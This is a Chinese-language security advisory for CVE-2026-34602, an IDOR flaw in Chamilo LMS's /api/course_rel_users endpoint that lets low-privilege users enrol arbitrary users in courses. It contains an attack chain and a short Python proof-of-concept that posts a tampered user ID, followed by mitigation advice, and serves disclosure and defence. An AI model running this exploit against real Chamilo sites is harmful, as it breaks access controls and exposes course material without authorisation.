CVE-2026-34602 CVSS 7.1 高危

CVE-2026-34602 Chamilo LMS IDOR漏洞致任意用户注册

披露日期: 2026-04-14

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34602

漏洞类型

不安全的直接对象引用 (IDOR)

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Chamilo LMS

漏洞概述

Chamilo LMS是一款开源学习管理系统。在2.0.0-RC.3之前的版本中，其/api/course_rel_users端点存在不安全的直接对象引用（IDOR）漏洞。攻击者利用该漏洞，可在仅需低权限认证的情况下，通过篡改请求体中的用户ID参数，绕过服务端所有权验证，将任意用户强制注册到任意课程中。此漏洞可能导致未授权访问课程材料，严重破坏平台的注册控制机制和完整性。

技术细节

该漏洞的根本原因在于后端API在处理用户与课程关联请求时，缺乏对访问控制列表（ACL）的严格校验。具体而言，/api/course_rel_users接口在接收POST请求时，直接信任请求体中的用户标识符，而未验证当前认证会话是否有权操作该目标用户ID。攻击者首先需要获取一个有效的低权限账户凭证，随后构造特定的HTTP请求，将目标受害者ID和目标课程ID填入参数。由于服务器端未实施“用户所有权检查”或“管理员权限验证”，请求被成功处理，导致任意用户被非法添加到特定课程中，绕过了正常的报名审批流程。

攻击链分析

STEP 1

信息收集

识别目标系统为Chamilo LMS，并确认版本在2.0.0-RC.3之前。

STEP 2

获取凭证

注册或通过其他方式获取一个普通低权限用户的账户凭证及会话Token。

STEP 3

构造请求

向/api/course_rel_users端点发送POST请求，修改请求体中的user参数为目标受害者的ID。

STEP 4

执行攻击

服务器因缺少校验直接处理请求，将目标用户添加到指定课程中。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
url = "https://target-chamilo.com/api/course_rel_users"

# Attacker's session cookie (authenticated)
cookies = {
    "PHPSESSID": "attacker_session_id_here"
}

# Payload to enroll a specific user (victim_id) to a specific course (course_code)
payload = {
    "user": 1234,          # The victim's user ID to be enrolled
    "course_code": "ABC123" # The target course code
}

# Sending the request
response = requests.post(url, cookies=cookies, json=payload)

if response.status_code == 200:
    print("[+] Exploit successful: User enrolled.")
else:
    print("[-] Exploit failed.")

影响范围

Chamilo LMS < 2.0.0-RC.3

防御指南

临时缓解措施

如果无法立即升级，建议通过网络ACL限制对/api/course_rel_users接口的访问来源，或部署Web应用防火墙（WAF）规则，检测并拦截包含异常用户ID参数的请求，同时密切监控用户注册日志以发现异常行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表